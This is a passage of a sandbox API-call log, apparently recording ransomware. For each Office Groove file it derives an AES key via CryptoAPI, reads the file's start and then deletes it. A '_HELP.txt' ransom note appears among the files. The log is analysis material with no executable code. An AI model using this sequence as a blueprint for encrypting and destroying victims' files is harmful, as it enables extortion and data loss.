| out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.964] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.964] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.964] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_italic.gif")) returned 1 [0167.968] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.968] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.968] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.968] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.968] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x352 [0167.968] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.972] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.972] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.972] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.974] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_justify.gif")) returned 1 [0167.976] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.977] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.977] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.977] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.977] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x373 [0167.977] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.986] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.986] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.987] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.988] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_pressed.gif")) returned 1 [0167.992] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.993] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.993] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.993] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.993] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35c [0167.993] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.001] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.002] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.002] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.003] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_underline.gif")) returned 1 [0168.005] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.005] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.005] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.006] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.006] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e57 [0168.006] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.021] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.021] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.021] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.023] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\utilityfunctions.js")) returned 1 [0168.025] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.025] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.025] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.026] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.026] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6427 [0168.026] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.030] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.030] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.030] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\validation.js")) returned 1 [0168.034] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.035] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.035] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.035] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.035] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd78 [0168.035] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.041] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.041] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.041] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg")) returned 1 [0168.044] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.045] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.045] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.045] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.045] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0168.045] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.046] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.046] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.046] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\_help.txt")) returned 1 [0168.063] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0168.064] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.065] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.065] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.065] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.065] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe8 [0168.065] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.068] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.068] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.068] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.140] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\addtoviewarrow.jpg")) returned 1 [0168.141] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.142] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.142] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.142] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.142] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x924 [0168.142] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.153] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.153] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.153] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\addtoviewarrowmask.bmp")) returned 1 [0168.156] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.157] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.157] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.157] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.157] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xae8 [0168.157] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.165] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.165] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.165] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.166] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\attention.gif")) returned 1 [0168.168] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.169] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.169] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.169] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.169] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161d [0168.169] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.176] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.177] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.177] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_casual.gif")) returned 1 [0168.181] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.182] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.182] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.182] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.182] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7dd3 [0168.182] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.195] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.195] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.195] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_country.gif")) returned 1 [0168.199] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.199] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.199] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.199] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.199] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132a [0168.200] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.207] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.207] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.207] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_earthy.gif")) returned 1 [0168.211] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.211] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.211] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.211] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.212] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x167bd [0168.212] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.220] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.220] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.220] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepage.gif")) returned 1 [0168.224] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.225] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.225] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.225] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.225] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4ebb [0168.225] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.229] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.229] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.229] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepageblank.gif")) returned 1 [0168.232] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.233] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.233] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.233] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.233] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40f [0168.233] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.236] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.236] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.236] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageSlice.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepageslice.gif")) returned 1 [0168.239] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.240] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.240] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.240] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.240] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5690 [0168.240] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.245] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.245] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.245] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_greentea.gif")) returned 1 [0168.248] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.249] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.249] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.249] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.249] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a [0168.249] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x6a, lpOverlapped=0x0) returned 1 [0168.251] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.251] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.251] CryptReleaseContext 